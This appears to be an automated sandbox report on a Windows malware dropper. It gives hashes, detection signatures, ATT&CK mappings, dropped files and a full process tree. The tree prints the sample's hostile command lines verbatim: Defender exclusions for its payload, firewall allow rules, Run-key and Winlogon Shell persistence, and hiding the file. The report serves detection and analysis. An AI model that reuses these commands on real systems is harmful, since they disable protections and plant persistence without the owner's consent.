70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b

Analysis

max time kernel
87s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
22/09/2023, 09:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b.exe
Size

1.4MB
MD5

22a9e3e1744a39868a26ecb7bd5de4c5
SHA1

f10de9135c39cd09888d98b10a1408f12fc3e4c2
SHA256

70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b
SHA512

37dedea9e9b863dea1d8c2f785a33a8895c2d98902d4c1dce61fa3b8fe4e13b428e566408e0daf11586619fc3171d6e7ba7c78e6d3b063c7547095603484e431
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
3420	netsh.exe
1016	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00070000000231f8-105.dat	acprotect
behavioral1/files/0x00070000000231f8-104.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b.exe

Executes dropped EXE 2 IoCs

pid	Process
1760	7z.exe
1048	ratt.exe

Loads dropped DLL 1 IoCs

pid	Process
1760	7z.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000231fb-101.dat	upx
behavioral1/files/0x00070000000231f8-105.dat	upx
behavioral1/memory/1760-106-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/files/0x00070000000231f8-104.dat	upx
behavioral1/files/0x00070000000231fb-103.dat	upx
behavioral1/memory/1760-102-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/memory/1760-110-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4572	PING.EXE
988	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4636	powershell.exe
4636	powershell.exe
4536	powershell.exe
4536	powershell.exe
4472	powershell.exe
4472	powershell.exe
2616	powershell.exe
2616	powershell.exe
2116	powershell.exe
2116	powershell.exe
4148	powershell.exe
4148	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	896	WMIC.exe
Token: SeSecurityPrivilege	896	WMIC.exe
Token: SeTakeOwnershipPrivilege	896	WMIC.exe
Token: SeLoadDriverPrivilege	896	WMIC.exe
Token: SeSystemProfilePrivilege	896	WMIC.exe
Token: SeSystemtimePrivilege	896	WMIC.exe
Token: SeProfSingleProcessPrivilege	896	WMIC.exe
Token: SeIncBasePriorityPrivilege	896	WMIC.exe
Token: SeCreatePagefilePrivilege	896	WMIC.exe
Token: SeBackupPrivilege	896	WMIC.exe
Token: SeRestorePrivilege	896	WMIC.exe
Token: SeShutdownPrivilege	896	WMIC.exe
Token: SeDebugPrivilege	896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	896	WMIC.exe
Token: SeRemoteShutdownPrivilege	896	WMIC.exe
Token: SeUndockPrivilege	896	WMIC.exe
Token: SeManageVolumePrivilege	896	WMIC.exe
Token: 33	896	WMIC.exe
Token: 34	896	WMIC.exe
Token: 35	896	WMIC.exe
Token: 36	896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	896	WMIC.exe
Token: SeSecurityPrivilege	896	WMIC.exe
Token: SeTakeOwnershipPrivilege	896	WMIC.exe
Token: SeLoadDriverPrivilege	896	WMIC.exe
Token: SeSystemProfilePrivilege	896	WMIC.exe
Token: SeSystemtimePrivilege	896	WMIC.exe
Token: SeProfSingleProcessPrivilege	896	WMIC.exe
Token: SeIncBasePriorityPrivilege	896	WMIC.exe
Token: SeCreatePagefilePrivilege	896	WMIC.exe
Token: SeBackupPrivilege	896	WMIC.exe
Token: SeRestorePrivilege	896	WMIC.exe
Token: SeShutdownPrivilege	896	WMIC.exe
Token: SeDebugPrivilege	896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	896	WMIC.exe
Token: SeRemoteShutdownPrivilege	896	WMIC.exe
Token: SeUndockPrivilege	896	WMIC.exe
Token: SeManageVolumePrivilege	896	WMIC.exe
Token: 33	896	WMIC.exe
Token: 34	896	WMIC.exe
Token: 35	896	WMIC.exe
Token: 36	896	WMIC.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	4536	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeIncreaseQuotaPrivilege	3876	WMIC.exe
Token: SeSecurityPrivilege	3876	WMIC.exe
Token: SeTakeOwnershipPrivilege	3876	WMIC.exe
Token: SeLoadDriverPrivilege	3876	WMIC.exe
Token: SeSystemProfilePrivilege	3876	WMIC.exe
Token: SeSystemtimePrivilege	3876	WMIC.exe
Token: SeProfSingleProcessPrivilege	3876	WMIC.exe
Token: SeIncBasePriorityPrivilege	3876	WMIC.exe
Token: SeCreatePagefilePrivilege	3876	WMIC.exe
Token: SeBackupPrivilege	3876	WMIC.exe
Token: SeRestorePrivilege	3876	WMIC.exe
Token: SeShutdownPrivilege	3876	WMIC.exe
Token: SeDebugPrivilege	3876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3876	WMIC.exe
Token: SeRemoteShutdownPrivilege	3876	WMIC.exe
Token: SeUndockPrivilege	3876	WMIC.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 3184 wrote to memory of 4620	3184	70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b.exe	85
PID 3184 wrote to memory of 4620	3184	70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b.exe	85
PID 3184 wrote to memory of 4620	3184	70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b.exe	85
PID 4620 wrote to memory of 4012	4620	cmd.exe	88
PID 4620 wrote to memory of 4012	4620	cmd.exe	88
PID 4620 wrote to memory of 4012	4620	cmd.exe	88
PID 4012 wrote to memory of 32	4012	cmd.exe	89
PID 4012 wrote to memory of 32	4012	cmd.exe	89
PID 4012 wrote to memory of 32	4012	cmd.exe	89
PID 4620 wrote to memory of 3592	4620	cmd.exe	90
PID 4620 wrote to memory of 3592	4620	cmd.exe	90
PID 4620 wrote to memory of 3592	4620	cmd.exe	90
PID 3592 wrote to memory of 896	3592	cmd.exe	91
PID 3592 wrote to memory of 896	3592	cmd.exe	91
PID 3592 wrote to memory of 896	3592	cmd.exe	91
PID 4620 wrote to memory of 4636	4620	cmd.exe	93
PID 4620 wrote to memory of 4636	4620	cmd.exe	93
PID 4620 wrote to memory of 4636	4620	cmd.exe	93
PID 4620 wrote to memory of 4536	4620	cmd.exe	96
PID 4620 wrote to memory of 4536	4620	cmd.exe	96
PID 4620 wrote to memory of 4536	4620	cmd.exe	96
PID 4620 wrote to memory of 4472	4620	cmd.exe	97
PID 4620 wrote to memory of 4472	4620	cmd.exe	97
PID 4620 wrote to memory of 4472	4620	cmd.exe	97
PID 4620 wrote to memory of 2616	4620	cmd.exe	98
PID 4620 wrote to memory of 2616	4620	cmd.exe	98
PID 4620 wrote to memory of 2616	4620	cmd.exe	98
PID 4620 wrote to memory of 2116	4620	cmd.exe	99
PID 4620 wrote to memory of 2116	4620	cmd.exe	99
PID 4620 wrote to memory of 2116	4620	cmd.exe	99
PID 4620 wrote to memory of 1760	4620	cmd.exe	100
PID 4620 wrote to memory of 1760	4620	cmd.exe	100
PID 4620 wrote to memory of 1760	4620	cmd.exe	100
PID 4620 wrote to memory of 4148	4620	cmd.exe	101
PID 4620 wrote to memory of 4148	4620	cmd.exe	101
PID 4620 wrote to memory of 4148	4620	cmd.exe	101
PID 4148 wrote to memory of 3420	4148	powershell.exe	104
PID 4148 wrote to memory of 3420	4148	powershell.exe	104
PID 4148 wrote to memory of 3420	4148	powershell.exe	104
PID 4148 wrote to memory of 1016	4148	powershell.exe	105
PID 4148 wrote to memory of 1016	4148	powershell.exe	105
PID 4148 wrote to memory of 1016	4148	powershell.exe	105
PID 4148 wrote to memory of 1444	4148	powershell.exe	106
PID 4148 wrote to memory of 1444	4148	powershell.exe	106
PID 4148 wrote to memory of 1444	4148	powershell.exe	106
PID 1444 wrote to memory of 3876	1444	cmd.exe	107
PID 1444 wrote to memory of 3876	1444	cmd.exe	107
PID 1444 wrote to memory of 3876	1444	cmd.exe	107
PID 4148 wrote to memory of 2912	4148	powershell.exe	108
PID 4148 wrote to memory of 2912	4148	powershell.exe	108
PID 4148 wrote to memory of 2912	4148	powershell.exe	108
PID 2912 wrote to memory of 1416	2912	cmd.exe	109
PID 2912 wrote to memory of 1416	2912	cmd.exe	109
PID 2912 wrote to memory of 1416	2912	cmd.exe	109
PID 4148 wrote to memory of 1048	4148	powershell.exe	110
PID 4148 wrote to memory of 1048	4148	powershell.exe	110
PID 4148 wrote to memory of 1048	4148	powershell.exe	110
PID 4148 wrote to memory of 3352	4148	powershell.exe	112
PID 4148 wrote to memory of 3352	4148	powershell.exe	112
PID 4148 wrote to memory of 3352	4148	powershell.exe	112

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3352	attrib.exe

C:\Users\Admin\AppData\Local\Temp\70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b.exe
"C:\Users\Admin\AppData\Local\Temp\70383ce20c25f78d2213fc34a47c52f956c528326241a412a34aa8167de9f33b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:32
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4536
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2116
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3420
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1016
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1444
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="BQNDLEKG" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3876
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:1416
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Executes dropped EXE
      PID:1048
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:4472
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 9
        6⤵
        Runs ping.exe
        
        PID:4572
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        6⤵
        
        PID:1332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 11 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 11 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:3176
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 11
        6⤵
        Runs ping.exe
        
        PID:988
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:3352
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    PID:4104
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    PID:736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
613.0MB

MD5
2c50f2f212440b7146e67d25c86f968e

SHA1
ead618edccda3bf9ec3b43a5583bc1a20ecf3dff

SHA256
be7b94c04d383cd00f8fe5847c461a245daa8e6e9a20f72ddb2c91a4b54b99ae

SHA512
206a94998645b3cc98ca2ac782ec43a1c8fc58df8a9d1ed571c30a807c30709a5945cfe16000cdbee8e7dc54995aa10771849ef62127daf68c0e907ce09e6b14

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
318.1MB

MD5
4dba6a6faeec27b7f37fdecf8903c42e

SHA1
3336d93ba94875799b7f12b1adc710ab390a5d2b

SHA256
eafe5c658824458aa5ab72032c0c6f1795d8a2af1009cb7b13bffdc80db7ce99

SHA512
79581dafa52b1f0d0d7ff7e82c0724081531c19689fbda371db95f3542ab09f8da62eda933e362b2778270de99fc5cd888995e70cac7b6ebac5883dd2d72c051

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log

Filesize
1KB

MD5
9a2d0ce437d2445330f2646472703087

SHA1
33c83e484a15f35c2caa3af62d5da6b7713a20ae

SHA256
30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c

SHA512
a61d18d90bfad9ea8afdfa37537cfea3d5a3d0c161e323fa65840c283bdc87c3de85daaff5519beea2f2719eec1c68398eea8679b55ff733a61052f073162d5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
62a9b1840f70364201889bb0b2840855

SHA1
4294ef3ccf91282b86d025cef4c3cf4a083f444e

SHA256
2a24615aebf1bc19e719feec00fd2358561bed27eeb45b71405d6b57d8c55f18

SHA512
6789900bf749fda8134bb08b5096b6b5b2a52e0a80781aaa6a22ab04dab11e3864a0fb22b7a7d6f3e3999e77d4185fa3b8eb7deee47e6a308437682c5cb80d2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
e7414cd46562103461fd6f1bc42b8f3a

SHA1
9636cd07e35796e66f6431532e13d4cb92e3f170

SHA256
5a9b7546847ff982519e36a99f05c7582989b8cf3af219888b5f276f323b689d

SHA512
215c5ce0e19e63355b1e6d786337a5014418d2ee864af606276ebbc6184bcd7061e30de47a9160af577282f34c98c8369154988ad755f509040ec7341088a8c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
33d6311b4ac89567fa86604f56138db6

SHA1
911c121430f3660ff977b722d54a1555ca111d1a

SHA256
8d787dbca054fe7f8cdbf8f95d03219730e58dad794f05eed94b0c1a6a5de337

SHA512
1edf23f505a3e3169dd429f8364ef4f983f456730a9be7281c3affed196ddcc5fddf99a2aed7419a8652805c20bd2278e980bef35830ec7efdd473f3c86cbbeb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
af0ec223fb4eb8fba7da6412dbd2774f

SHA1
3aa07d0684999cea10f56d5394b88a53153f9ee6

SHA256
a7c901b2cc91d7b3d21f60f85886acce98b8abb5789c81fae30641de9bd111c5

SHA512
bb3af8689182bf9f230c51bd3d430df9cf0f181a57a238d34ede636024ae5b54bc02fe9b317267a4efa0a849c568bd33d154f247f103e13af8c3ca9ba0164c95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
b4b8295951274892aa7f83d30338ef9d

SHA1
c6d84d56a3683ec5bd6cfa1be03f0d2c78b0210d

SHA256
f0eaf3b47630365d4283df95a6068a5f590cc7f9559a1b282ec4dbf30831c8cf

SHA512
f913ec3fcfecaf231332f46caabf6a81a9dd4ab46cf9c8d8b48394742bd1ec29d1e1665273fe604f364d1949cb5e6303a0bd03b14dfaadeac0a523db0a006cb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bhslmtdj.prb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
745.1MB

MD5
be788bb3680cf3809d9678ee6f7ba321

SHA1
499f01d5f654f83e172004dcc03f99abdd251734

SHA256
03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

SHA512
83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
253.7MB

MD5
13dab758bc3f749e36a1c41581c74944

SHA1
da0abc053a6137f4c91ba0e30bcbb4b348a54ffd

SHA256
7a6fac71bafe93fa30d716b6933aaaf01a8a1c9ea6498ef0ffdf1d749a479efe

SHA512
95d200543f0270eb0e8e7f8673a57958ae45bd81e0c8cb816a6518022d1db18be42be9d47434decefcb43543f64ddb744c53e37080c58fcc703d210b0cb69a9f

Download Submit
memory/1048-168-0x0000000075200000-0x00000000759B0000-memory.dmp

Filesize
7.7MB

Download
memory/1048-161-0x0000000005040000-0x00000000050DC000-memory.dmp

Filesize
624KB

Download
memory/1048-159-0x0000000000B20000-0x0000000000CD6000-memory.dmp

Filesize
1.7MB

Download
memory/1048-160-0x0000000075200000-0x00000000759B0000-memory.dmp

Filesize
7.7MB

Download
memory/1048-164-0x0000000005180000-0x0000000005212000-memory.dmp

Filesize
584KB

Download
memory/1048-165-0x00000000053C0000-0x00000000053D0000-memory.dmp

Filesize
64KB

Download
memory/1048-166-0x00000000050E0000-0x0000000005126000-memory.dmp

Filesize
280KB

Download
memory/1048-167-0x0000000005330000-0x000000000533A000-memory.dmp

Filesize
40KB

Download
memory/1760-110-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1760-102-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1760-106-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/2116-99-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/2116-85-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/2116-86-0x00000000026C0000-0x00000000026D0000-memory.dmp

Filesize
64KB

Download
memory/2116-98-0x00000000026C0000-0x00000000026D0000-memory.dmp

Filesize
64KB

Download
memory/2616-72-0x00000000027F0000-0x0000000002800000-memory.dmp

Filesize
64KB

Download
memory/2616-84-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/2616-71-0x00000000752D0000-0x0000000075A80000-memory.dmp

Filesize
7.7MB

Download
memory/4148-148-0x0000000007580000-0x0000000007591000-memory.dmp

Filesize
68KB

Download
memory/4148-145-0x0000000075200000-0x00000000759B0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-163-0x0000000075200000-0x00000000759B0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-156-0x00000000085D0000-0x0000000008B74000-memory.dmp

Filesize
5.6MB

Download
memory/4148-155-0x0000000007730000-0x0000000007752000-memory.dmp

Filesize
136KB

Download
memory/4148-153-0x00000000026E0000-0x00000000026F0000-memory.dmp

Filesize
64KB

Download
memory/4148-152-0x00000000075F0000-0x00000000075F8000-memory.dmp

Filesize
32KB

Download
memory/4148-151-0x00000000076C0000-0x00000000076DA000-memory.dmp

Filesize
104KB

Download
memory/4148-150-0x00000000075B0000-0x00000000075C4000-memory.dmp

Filesize
80KB

Download
memory/4148-149-0x00000000075A0000-0x00000000075AE000-memory.dmp

Filesize
56KB

Download
memory/4148-114-0x0000000075200000-0x00000000759B0000-memory.dmp

Filesize
7.7MB

Download
memory/4148-115-0x00000000026E0000-0x00000000026F0000-memory.dmp

Filesize
64KB

Download
memory/4148-125-0x0000000005AC0000-0x0000000005E14000-memory.dmp

Filesize
3.3MB

Download
memory/4148-147-0x0000000007620000-0x00000000076B6000-memory.dmp

Filesize
600KB

Download
